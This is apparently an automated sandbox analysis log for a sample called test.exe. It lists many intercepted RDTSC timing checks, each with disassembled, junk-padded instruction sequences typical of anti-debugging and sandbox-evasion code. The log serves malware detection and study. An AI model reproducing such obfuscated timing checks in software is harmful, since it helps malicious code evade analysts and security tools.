              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB9528 second address: EB9569 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F403C75C8F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F403C75C905h 0x00000013 nop 0x00000014 jmp 00007F403C75C8FEh 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+12454B3Fh], ecx 0x00000021 push 00000000h 0x00000023 cld 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBA5A8 second address: EBA5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403D12A5BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBA5B9 second address: EBA5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB96BB second address: EB974B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, esi 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F403D12A5B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jl 00007F403D12A5B8h 0x00000032 mov edi, esi 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov di, dx 0x0000003e mov bx, A5E6h 0x00000042 mov eax, dword ptr [ebp+122D0FD1h] 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007F403D12A5B8h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 0000001Ah 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 sub bx, 8060h 0x00000067 push FFFFFFFFh 0x00000069 call 00007F403D12A5BAh 0x0000006e mov ebx, dword ptr [ebp+122D3966h] 0x00000074 pop ebx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b pop eax 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB974B second address: EB9764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBB5C4 second address: EBB5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC69E second address: EBC6AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC6AC second address: EBC6B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F403D12A5B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC6B6 second address: EBC6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBC6BA second address: EBC724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F403D12A5B8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 or di, B080h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F403D12A5B8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov dword ptr [ebp+1247A2A5h], edx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F403D12A5C0h 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBF515 second address: EBF5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C903h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F403C75C8F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a mov esi, dword ptr [ebp+122D3832h] 0x00000030 call 00007F403C75C906h 0x00000035 mov edi, dword ptr [ebp+122D1D3Ah] 0x0000003b pop esi 0x0000003c popad 0x0000003d jmp 00007F403C75C908h 0x00000042 push 00000000h 0x00000044 jmp 00007F403C75C906h 0x00000049 xchg eax, esi 0x0000004a jmp 00007F403C75C8FAh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBF5B8 second address: EBF5BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EBF5BE second address: EBF5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F403C75C8F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F05001 second address: F05005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F05005 second address: F0500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0500B second address: F05023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C900h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0AEFD second address: F0AF01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0AF01 second address: F0AF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F403C75C8F8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0AF0F second address: F0AF33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C9h 0x00000007 pushad 0x00000008 jnl 00007F403D12A5B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C11 second address: E69C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C15 second address: E69C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F403D12A5C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F403D12A5C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C35 second address: E69C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C3B second address: E69C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F403D12A5E7h 0x0000000b jmp 00007F403D12A5C5h 0x00000010 pushad 0x00000011 jmp 00007F403D12A5C0h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F098D6 second address: F098DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F098DB second address: F098E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F098E0 second address: F09920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F403C75C8F6h 0x0000000a jl 00007F403C75C8F6h 0x00000010 jmp 00007F403C75C8FAh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007F403C75C8FEh 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 jmp 00007F403C75C8FCh 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F09920 second address: F09934 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F403D12A5B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F09C6B second address: F09C75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB66EC second address: EB66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB66F0 second address: EB66F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB66F4 second address: EB675F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D368Ah], edi 0x0000000e mov ebx, dword ptr [ebp+12489864h] 0x00000014 pushad 0x00000015 or edi, dword ptr [ebp+122D2122h] 0x0000001b mov edx, dword ptr [ebp+122D3826h] 0x00000021 popad 0x00000022 jnl 00007F403D12A5B6h 0x00000028 add eax, ebx 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F403D12A5B8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007F403D12A5CDh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB675F second address: EB67D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F403C75C8F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dx, di 0x0000002a mov dword ptr [ebp+122D368Ah], edi 0x00000030 push 00000004h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F403C75C8F8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c ja 00007F403C75C902h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB67D6 second address: EB67DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB67DA second address: EB67E4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12FCF second address: F12FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F11055 second address: F110A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F403C75C8F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F403C75C8FDh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F403C75C907h 0x0000001b jne 00007F403C75C8F6h 0x00000021 jmp 00007F403C75C900h 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F111EA second address: F111EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F117D5 second address: F117EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F403C75C8FDh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F117EA second address: F117EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F11B29 second address: F11B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F403C75C8FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1268B second address: F126DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d jmp 00007F403D12A5C6h 0x00000012 jc 00007F403D12A5B8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F403D12A5C7h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F126DC second address: F126FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F403C75C8FBh 0x0000000c jmp 00007F403C75C8FAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F129EC second address: F12A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F403D12A5C0h 0x0000000b jmp 00007F403D12A5BAh 0x00000010 push edi 0x00000011 jmp 00007F403D12A5C7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12CC6 second address: F12CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12CCA second address: F12CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F403D12A5C8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12CE8 second address: F12CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F403C75C8F6h 0x00000009 jns 00007F403C75C8F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F16C8E second address: F16C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F403D12A5B6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F15EC7 second address: F15ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F15ECB second address: F15EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F162D6 second address: F162DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F162DA second address: F162E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F16436 second address: F1643B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1643B second address: F16441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F16582 second address: F165A2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F403C75C8F6h 0x00000008 jnl 00007F403C75C8F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F403C75C8FCh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1CBB6 second address: F1CBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1CBC6 second address: F1CBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1CBCC second address: F1CBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F403D12A5B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F25C41 second address: F25C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F25C46 second address: F25C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24947 second address: F24966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 jg 00007F403C75C8F6h 0x00000016 popad 0x00000017 je 00007F403C75C8FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24966 second address: F2496A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F2496A second address: F24988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C904h 0x00000009 jl 00007F403C75C8F6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24AEA second address: F24AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24AF1 second address: F24B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F403C75C8F6h 0x00000009 jmp 00007F403C75C908h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F2539B second address: F253D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F403D12A5C3h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F403D12A5C4h 0x00000011 je 00007F403D12A5BCh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F253D8 second address: F253EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C901h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F239E2 second address: F239EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F239EB second address: F23A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C905h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F23A04 second address: F23A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F403D12A5B6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F2B5E3 second address: F2B5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F380E2 second address: F38106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F403D12A5BEh 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007F403D12A5B6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F37DDB second address: F37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F37DE1 second address: F37DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3AB91 second address: F3ABA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F403C75C8F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABA7 second address: F3ABB7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F403D12A5B6h 0x00000008 jnp 00007F403D12A5B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABB7 second address: F3ABC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABC1 second address: F3ABDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BCh 0x00000007 jg 00007F403D12A5B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABDA second address: F3ABE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABE0 second address: F3ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F26 second address: F42F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F403C75C8F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F35 second address: F42F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5BCh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F46 second address: F42F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F4C second address: F42F79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F403D12A5C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F403D12A5BBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F4E0B5 second address: F4E0C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F403C75C8F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
